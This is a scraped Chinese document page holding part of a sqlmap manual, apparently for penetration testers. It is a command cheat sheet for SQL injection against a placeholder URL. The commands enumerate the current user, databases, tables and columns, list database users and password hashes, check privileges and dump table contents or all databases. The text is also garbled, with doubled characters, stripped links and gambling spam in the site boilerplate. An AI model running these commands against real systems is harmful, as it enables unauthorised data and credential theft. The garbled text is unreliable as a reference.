- 1、本文档共6页,可阅读全部内容。
- 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
sqlmap技术手册
Sqlmap 必威体育精装版测试文档 Email:linuxseclab@ 1
sql sqlmap
sql sqlmap
测试许多款ssqqll注入工具 最终还是发现ssqqllmmaapp 最为强悍 谁用谁知道!
sql : )
sql : )
赶紧抛弃掉手上一大堆ssqqll注入工具吧 :: ))
ubuntu 10.10 windows 7(x64) sqlmap/1.0-dev (r4405)
ubuntu 10.10 windows 7(x64) sqlmap/1.0-dev (r4405)
测试环境:uubbuunnttuu 1100..1100 wwiinnddoowwss 77((xx6644)) ssqqllmmaapp//11..00--ddeevv ((r)
如使用过程中出错 请使用下面最近更新的稳定版本:
/c0adthmqf1
更新升级 :
sqlmap -update
svn checkout /sqlmap/trunk/sqlmap sqlmap-dev
帮助::::
sqlmap -h
官方必威体育精装版文档:/doc/README.html
****************** ***************
****************** ***************
************************************基本步骤******************************
sqlmap -u http://url/news?id=1 --current-user #获取当前用户名称
sqlmap -u /news?id=1 --current-db #获取当前数
据库名称
sqlmap -u /news?id=1 --tables -D db_name #列
表名
sqlmap -u http://url/news?id=1 --columns -T tablename users-D
db_name -v 0 #列字段
sqlmap -u http://url/news?id=1 --dump -C column_name -T
table_name -D db_name -v
0 #获取字段内容
更多技术信息请访问:/nginxshell
Sqlmap 必威体育精装版测试文档 Email:linuxseclab@ 2
****************** ******************
****************** ******************
************************************信息获取************************************
sqlmap -u http://url/news?id=1 --dbms Mysql --users # dbms 指定数
据库类型
sqlmap -u http://url/news?id=1 --users #列数据库用户
sqlmap -u http://url/news?id=1 --dbs#列数据库
sqlmap -u http://url/news?id=1 --passwords #数据库用户密码
sqlmap -u http://url/news?id=1 --passwords-U root -v 0 #列出指定用户
数据库密码
sqlmap -u http://url/news?id=1 --dump -C password,user,id -T
tablename -D db_name
--start 1 --stop 20 #列出指定字段,列出20 条
sqlmap -u http://url/news?id=1 --dump-all -v 0 #列出所有数据库所有表
sqlmap -u http://url/news?id=1 --privileges #查看权限
sqlmap -u
文档评论(0)